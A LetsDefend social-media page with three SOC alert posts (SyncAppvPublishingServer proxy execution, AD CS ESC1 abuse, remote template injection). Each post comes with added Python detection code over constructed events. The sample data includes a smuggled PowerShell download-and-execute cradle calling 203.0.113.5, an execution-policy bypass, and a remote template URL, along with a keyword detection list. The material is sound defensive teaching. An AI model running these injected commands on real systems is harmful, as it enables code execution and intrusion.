LetsDefend
3.2K posts

LetsDefend
@LetsDefendIO
LetsDefend, now part of Hack The Box. Read more: https://t.co/jxMnGZ4Yne
Cloud · Joined July 2020
1 Following · 139.6K Followers

⚠️ New SOC Alert: SyncAppvPublishingServer Execution to Bypass PowerShell Restriction
Attackers use SyncAppvPublishingServer.vbs (a legit Microsoft-signed script) to proxy PowerShell commands via wscript.exe, bypassing execution policy restrictions. This "living off the land" technique evades defenses by mimicking trusted system behavior.
👥 Role: Incident Responder
🛠️ Type: Persistence
💪 Difficulty: Medium
🔢 Event ID: 294
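Added example (not from the LetsDefend post): a small detection routine for the pattern the post describes, run over constructed process-creation events in Sysmon Event ID 1 style. It flags wscript.exe/cscript.exe launching SyncAppvPublishingServer.vbs with extra statements smuggled into its argument, and the powershell.exe the script then spawns. The sample events, the token list and the reason strings are assumptions for illustration, not real telemetry.

```python
import re

# Constructed process-creation events in Sysmon Event ID 1 style; not real telemetry.
SAMPLE_EVENTS = [
    {   # benign: App-V client sync, the argument is an ordinary server id / URL pair
        "Image": r"C:\Windows\System32\wscript.exe",
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "CommandLine": r'''wscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs "n" "http://appv.corp.example/"''',
    },
    {   # suspicious: PowerShell download cradle smuggled after a semicolon in the script argument
        "Image": r"C:\Windows\System32\wscript.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'''wscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs "n; IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"''',
    },
    {   # suspicious: the powershell.exe the script spawns, still carrying the injected command
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\wscript.exe",
        "CommandLine": r'''powershell.exe -ExecutionPolicy ByPass -NoProfile -Command "Sync-AppvPublishingServer n; Start-Process calc.exe"''',
    },
    {   # benign: unrelated script host use
        "Image": r"C:\Windows\System32\cscript.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"cscript.exe C:\Scripts\inventory.vbs",
    },
]

VBS_NAME = "syncappvpublishingserver.vbs"
# PowerShell tokens that have no business inside a Sync-AppvPublishingServer argument (assumed list).
PS_TOKENS = re.compile(
    r"iex|invoke-expression|new-object|downloadstring|downloadfile|invoke-webrequest|"
    r"start-process|frombase64string|-e(?:nc|ncodedcommand)\b",
    re.IGNORECASE,
)

def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return a reason string when the event matches the technique, else None."""
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "").lower()

    # Stage 1: a script host handed SyncAppvPublishingServer.vbs an argument with extra statements.
    if image in ("wscript.exe", "cscript.exe") and VBS_NAME in cmd:
        arg = cmd.split(VBS_NAME, 1)[1]   # everything after the script path is attacker-controlled
        if ";" in arg and PS_TOKENS.search(arg):
            return "PowerShell expression injected into SyncAppvPublishingServer.vbs argument"
        if ";" in arg:
            return "statement separator in SyncAppvPublishingServer.vbs argument"

    # Stage 2: the resulting powershell.exe, parented by the script host rather than a user shell.
    if image in ("powershell.exe", "pwsh.exe") and parent in ("wscript.exe", "cscript.exe"):
        if "sync-appvpublishingserver" in cmd and (";" in cmd or PS_TOKENS.search(cmd)):
            return "powershell.exe spawned by script host with a modified Sync-AppvPublishingServer command"
    return None

def find_alerts(events):
    """Return (command line, reason) pairs for every matching event."""
    alerts = []
    for ev in events:
        reason = classify(ev)
        if reason:
            alerts.append((ev["CommandLine"], reason))
    return alerts

if __name__ == "__main__":
    for cmd, reason in find_alerts(SAMPLE_EVENTS):
        print(f"ALERT: {reason}\n   {cmd}")
```

The two stages matter because the second one survives even if the attacker obfuscates the first: a powershell.exe whose parent is wscript.exe and whose command line is a Sync-AppvPublishingServer call with anything after the server id is not what the App-V client produces on its own.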


⚠️ New SOC Alert: Suspicious Certificate Management Activity Detected
Attackers use suspicious certificate management to exploit misconfigured AD CS templates, requesting certs with elevated privileges (e.g., ESC1). This enables Kerberos auth as admins for lateral movement & persistence, evading password-based detection.
👥 Role: Incident Responder
🛠️ Type: C2
💪 Difficulty: High
🔢 Event ID: 293
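Added example (not from the LetsDefend post): the core ESC1 check a responder would run against AD CS audit records. With ESC1 the enrollee supplies the subject alternative name, so the tell-tale is a request whose SAN UPN names someone other than the requester. The records below are constructed in the shape of Security Event ID 4887 (certificate issued); the field layout, the template names and the high-value account list are assumptions for illustration.

```python
import re

# Constructed AD CS audit records in the shape of Security Event ID 4887; the field layout
# is an assumption for this example, not real logs.
SAMPLE_CERT_EVENTS = [
    {"EventID": 4887, "RequestId": 1101, "Requester": "CORP\\jdoe",
     "Attributes": "CertificateTemplate:User",
     "Subject": "CN=jdoe,OU=Users,DC=corp,DC=local"},
    {"EventID": 4887, "RequestId": 1102, "Requester": "CORP\\jdoe",
     "Attributes": "CertificateTemplate:VulnTemplate\nSAN:upn=administrator@corp.local",
     "Subject": "CN=jdoe"},
    {"EventID": 4887, "RequestId": 1103, "Requester": "CORP\\WEB01$",
     "Attributes": "CertificateTemplate:WebServer\nSAN:dns=web01.corp.local",
     "Subject": "CN=web01.corp.local"},
    {"EventID": 4887, "RequestId": 1104, "Requester": "CORP\\asmith",
     "Attributes": "CertificateTemplate:VulnTemplate\nSAN:upn=asmith@corp.local",
     "Subject": "CN=asmith"},
]

# Accounts whose appearance in an enrollee-supplied SAN is always worth paging on (assumed list).
HIGH_VALUE = {"administrator", "krbtgt"}

SAN_RE = re.compile(r"^\s*SAN:\s*(.+)$", re.IGNORECASE | re.MULTILINE)
UPN_RE = re.compile(r"upn=([^&,;\s]+)", re.IGNORECASE)
TEMPLATE_RE = re.compile(r"CertificateTemplate:\s*(\S+)", re.IGNORECASE)

def account_name(requester):
    """'CORP\\jdoe' -> 'jdoe' (drop the domain prefix, ignore case)."""
    return requester.rsplit("\\", 1)[-1].lower()

def esc1_indicators(event):
    """Reasons an issued certificate looks like ESC1 abuse; empty list when it looks normal."""
    if event.get("EventID") not in (4886, 4887):
        return []
    attrs = event.get("Attributes", "")
    san = SAN_RE.search(attrs)
    if not san:
        return []                       # no enrollee-supplied SAN: nothing to compare
    upn = UPN_RE.search(san.group(1))
    if not upn:
        return []                       # dns/email SANs need their own checks; out of scope here
    # Comparing the UPN prefix with the sAMAccountName is an approximation; in a real
    # environment resolve both against the directory instead.
    target = upn.group(1).split("@", 1)[0].lower()
    requester = account_name(event.get("Requester", ""))
    tmpl = TEMPLATE_RE.search(attrs)
    reasons = []
    if target != requester:
        reasons.append(f"{requester} requested a certificate whose SAN UPN names {target}"
                       f" (template {tmpl.group(1) if tmpl else '?'})")
    if target in HIGH_VALUE:
        reasons.append(f"SAN UPN names high-value account {target}")
    return reasons

def find_esc1(events):
    """Return {RequestId: [reasons]} for every event that carries ESC1 indicators."""
    return {ev["RequestId"]: r for ev in events if (r := esc1_indicators(ev))}

if __name__ == "__main__":
    for request_id, reasons in find_esc1(SAMPLE_CERT_EVENTS).items():
        print(f"request {request_id}:", "; ".join(reasons))
```

Request 1104 is deliberately left quiet: a user enrolling on a vulnerable template for their own UPN is a finding for the template owner, not an intrusion. Requester-to-SAN mismatch is the condition that turns it into one.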


⚠️ Unauthorized Template Modification Detected
Attackers use "Unauthorized Template Modification Detected"-style techniques to inject malicious code or references into document or certificate templates so that payloads are fetched or executed only when a user opens a file, bypassing static scanners and enabling stealthy persistence or privilege escalation.
👥 Role: Incident Responder
🛠️ Type: C2
💪 Difficulty: High
🔢 Event ID: 290
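Added example (not from the LetsDefend post): one reading of the document-template side of the post is a Word file whose settings part points its attached template at a remote location, so the payload is fetched only when the file is opened and the file itself contains nothing for a static scanner to flag. The scanner below builds a minimal OOXML package in memory with a constructed settings.xml.rels part and reports every external, fetch-on-open relationship that resolves off the local machine. The two relationship parts and the set of relationship types are assumptions for illustration.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
# Relationship types Word resolves while opening the document; with an external target
# that is a fetch the user never sees (assumed list for this example).
FETCH_ON_OPEN = {"attachedTemplate", "oleObject", "image"}

# Constructed settings.xml.rels parts; neither comes from a real document.
MALICIOUS_RELS = (
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId1" TargetMode="External" Target="http://203.0.113.5/t.dotm" '
    'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"/>'
    '</Relationships>'
)
BENIGN_RELS = (
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId1" TargetMode="External" '
    'Target="file:///C:/Users/jdoe/AppData/Roaming/Microsoft/Templates/Normal.dotm" '
    'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"/>'
    '</Relationships>'
)

def build_docx(settings_rels):
    """Assemble a minimal OOXML package in memory with the given settings.xml.rels part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml",
                   '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        z.writestr("word/settings.xml",
                   '<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
                   'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
                   '<w:attachedTemplate r:id="rId1"/></w:settings>')
        z.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()

def is_remote(target):
    """True when resolving the target would leave the local machine."""
    u = urlparse(target)
    if u.scheme.lower() in ("http", "https", "ftp"):
        return True
    if u.scheme.lower() == "file" and u.netloc:   # file://server/share/... is a UNC fetch
        return True
    return target.startswith("\\\\")               # raw UNC path

def scan_docx(data):
    """Return (part, relationship type, target) for every external fetch-on-open relationship."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(REL_NS + "Relationship"):
                rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                target = rel.get("Target", "")
                if rel.get("TargetMode") == "External" and rtype in FETCH_ON_OPEN and is_remote(target):
                    findings.append((name, rtype, target))
    return findings

if __name__ == "__main__":
    for label, rels in (("malicious", MALICIOUS_RELS), ("benign", BENIGN_RELS)):
        print(label, scan_docx(build_docx(rels)))
```

The benign sample is deliberately an external attachedTemplate too: Word writes a local file: URI for Normal.dotm, so matching on TargetMode="External" alone would alert on most documents. The scheme and host check is what separates a template fetch over HTTP or a UNC share from an ordinary local template.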
